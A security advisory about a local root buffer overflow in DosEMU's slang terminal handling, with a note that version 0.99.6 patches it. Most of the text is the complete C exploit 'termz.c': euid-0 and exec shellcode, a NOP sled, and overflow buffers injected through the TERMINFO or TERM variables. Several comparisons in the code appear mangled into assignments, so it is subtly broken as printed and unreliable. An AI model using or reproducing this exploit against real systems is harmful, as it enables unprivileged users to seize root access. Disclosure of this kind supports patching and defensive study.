|
Brought to you by:
Suppliers of:
|
|
|
| |
| DosEMU, a Linux application that enables the Linux operating system to run many DOS programs (including some DPMI apps), is vulnerable to a buffer overflow attack that assists in obtaining root access. |
| |
Credit:
The vulnerability and exploit code were provided by: DiGiT and crazy-b!.
DosEMU's home page can be found at: http://www.dosemu.org/.
|
| |
DosEMU, a program that is shipped with Linux is vulnerable to a buffer overflow, which may be used to obtain root access by an underprivileged user. Because DosEMU is given the default access of world execute (this is true for most Linux distributions), any malicious user can gain root access.
The buffer overflow occurs due to the usage of a small buffer in the following places:
1) Writing past the 'err_buf[512]' buffer size (can be found in the source code at sldiplay.c line 1616).
2) Writing past the 'file[256]' buffer size (can be found in the source code at sltermin.c' line 229).
An exploit code follows:
-- BEGIN termz.c
/*
* dosemu/slang overflow exploit for linux/x86
*
* by DiGiT and crazy-b!
*
* !!! for usage information run the program with no arguments !!!
*
* notez:
*
* with some versions of dosemu, an I/O error will occur when exploiting.
* this means you can not communicate with the prog you run from your
* terminal. after executing you may also need to reset your terminal.
*
* we suggest writing a shell script to secure your root privs, if you
* are not able to communicate with your shell. for this reason we have
* made it possible to specify what you want to execute. you may however
* not add any arguments to that command. this is because there simply
* weren't enought time for coding!
*
* because dosemu change its euid to non-root, we have added a little bit
* of code to set this to 0 for you. it can be selected before compiling,
* and should be on by default.
*
* Greetz, #hax, ADM, special greetz to [IG-88]!!
*
* Note: if yah got probs, brute force.
*/
#define PATH_DOSEMU "/usr/bin/dos"
#define DEF_BUFSIZE_1 268
#define DEF_OFFSET_1 911
#define DEF_BUFSIZE_2 1007
#define DEF_OFFSET_2 100
#define UNSET_TERMCAP
#define SET_EUID
#define IQ_LOCKED
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char sc[]
#ifdef SET_EUID
"\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80" /* set euid - craz */
#endif
"\xeb\x1f\x5e\x89\x76\xff\x31\xc0\x88\x46\xff\x89\x46\xff\xb0\x0b"
"\x89\xf3\x8d\x4e\xff\x8d\x56\xff\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff";
long get_sp ()
{
__asm__("movl %esp,%eax");
}
void usage ()
{
printf("usage: ./sploit type proggie [offset [bufsize]]\n\n");
printf("type must be one of:\t1 :TERMINFO\n\t\t\t2 :TERM\n\n");
exit(0);
}
int main (int argc, char **argv)
{
int bufsize, offset, n, type;
char *buf, *ptr;
long addr;
printf("\n (= DiGiT and crazy-b presents: =)\n");
printf(" (= linux/x86 dosemu/slang overflow =)\n\n");
if (argc < 3 || argc > 5) usage();
type = atoi(argv[1]);
if (type < 1 || type > 2) usage();
bufsize = argc > 4 ? atoi(argv[4]) :
(type = 1 ? DEF_BUFSIZE_1 : DEF_BUFSIZE_2);
offset = argc > 3 ? atoi(argv[3]) :
(type = 1 ? DEF_OFFSET_1 : DEF_OFFSET_2);
n = strlen(argv[2]);
#ifdef SET_EUID
sc[23] = sc[33] = n + 5; sc[15] = sc[30] = n + 1; sc[20] = n;
#else
sc[13] = sc[23] = n + 5; sc[5] = sc[20] = n + 1; sc[10] = n;
#endif
if ((buf = malloc(bufsize + 1)) = NULL) {
perror("malloc");
exit(-1);
}
addr = get_sp() - offset;
memset(buf, 0x90, bufsize);
ptr = (buf + bufsize) - (strlen(sc) + strlen(argv[2]) + 8);
for (n = 0; n < strlen(sc); n++)
*(ptr++) = sc[n];
for (n = 0; n < strlen(argv[2]); n++)
*(ptr++) = argv[2][n];
*(long *)((buf + bufsize) - 4) = addr;
*(long *)((buf + bufsize) - 8) = addr - 16;
printf(";;; type: %s, launching: %s\n",
type = 1 ? "TERMINFO" : "TERM", argv[2]);
printf(";;; bufsize: %i, offset: %i, address: 0x%lx\n\n",
bufsize, offset, addr);
#ifdef UNSET_TERMCAP
unsetenv("TERMCAP");
#endif
#ifndef IQ_LOCKED
setenv(type = 1 ? "TERMINFO" : "TERM", buf, 1);
execl(PATH_DOSEMU, "dos", 0);
#endif
exit(-1);
}
-- END termz.c
DosEMU's developers have been notified and a patch has been released, DosEMU 0.99.6 fixes the mentioned hole, and can be downloaded from:
ftp://ftp.dosemu.org/dosemu/Development/dosemu-0.99.6.tgz
To find out more about this bug from the DosEMU creators click here:
http://www.dosemu.org/docs/README/0.98/README-3.html
|
|
|
|
|
